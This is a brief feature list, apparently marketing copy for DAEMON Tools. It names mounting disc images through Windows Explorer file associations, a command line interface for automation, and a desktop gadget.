- Use File Associations to mount images right from Windows Explorer
- Use powerful Command Line Interface for automation purposes
- Perform basic actions via handy DAEMON Tools Gadget on Windows Desktop
